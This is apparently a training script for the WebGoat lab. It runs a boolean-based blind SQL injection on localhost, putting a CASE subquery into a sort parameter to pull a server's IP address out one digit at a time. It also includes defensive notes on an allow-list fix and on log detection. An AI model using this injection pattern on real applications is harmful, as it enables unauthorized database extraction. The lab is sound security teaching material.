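"""Boolean-based blind SQL injection exercise for a local WebGoat lab.

The script targets the WebGoat training application on localhost only. It
sends a CASE expression in the ``column`` query parameter of the
``SqlInjection/servers`` endpoint and reads one character of the ``ip``
value per position from which row comes back first.

Defensive reading of the lesson:

* Root cause (presumably): the endpoint copies ``column`` into the sort
  clause of its query. Identifiers cannot be bound as statement
  parameters, so the fix is to accept only names from a fixed allow-list
  of sortable columns and reject everything else.
* Detection: a parameter that should hold a bare column name but contains
  SQL keywords such as ``case``, ``select`` or ``substr`` is a strong
  signal in access logs or WAF telemetry, as is a burst of near-identical
  requests differing in a single character.
"""
import json
import string
import time

import requests

BASE_URL = "http://localhost:8080/WebGoat/SqlInjection/servers"

# Without a timeout, requests waits indefinitely on a stalled lab server.
REQUEST_TIMEOUT = 10  # seconds

headers = {
    "User-Agent": "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:66.0) Gecko/20100101 Firefox/66.0",
    "Accept": "*/*",
    "Accept-Language": "en-GB,en;q=0.5",
    "Referer": "http://localhost:8080/WebGoat/start.mvc",
    "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
    "X-Requested-With": "XMLHttpRequest",
    "Connection": "keep-alive",
    # NOTE(review): this is a session identifier from the author's own lab
    # login. Replace it with the cookie of your own WebGoat session, and do
    # not publish session tokens, even lab ones, in shared scripts.
    "Cookie": "JSESSIONID=78BBF34E5F19E8FAE372FAF8C309D279",
    # "Content-Length" and "Host" are left out on purpose: requests derives
    # both from the request itself, and a hand-written "Content-Length: 0"
    # is wrong as soon as a body is added.
}

ip = ""
for i in range(1, 5):
    for digit in string.digits:
        # The expression sorts by hostname when character i of the ip equals
        # `digit`, and by id otherwise.
        column = (
            "(case when (select ip from servers where hostname='webgoat-prd' "
            f"and substr(ip,{i},1) = '{digit}') IS NOT NULL "
            "then hostname else id end)"
        )
        # params= lets requests percent-encode the value instead of sending
        # raw spaces and quotes inside the URL.
        r = requests.get(
            BASE_URL,
            params={"column": column},
            headers=headers,
            timeout=REQUEST_TIMEOUT,
        )
        # Stop on an HTTP error instead of interpreting an error body as a
        # result; a non-JSON body (presumably what an expired session
        # returns) still raises in r.json() below.
        r.raise_for_status()
        # A first row other than id '1' means the hostname ordering was
        # applied, i.e. the guessed digit matched.
        if r.json()[0]['id'] != '1':
            ip += digit
            break
    # A position where no digit matches adds nothing to `ip` and is skipped
    # silently.
print(ip)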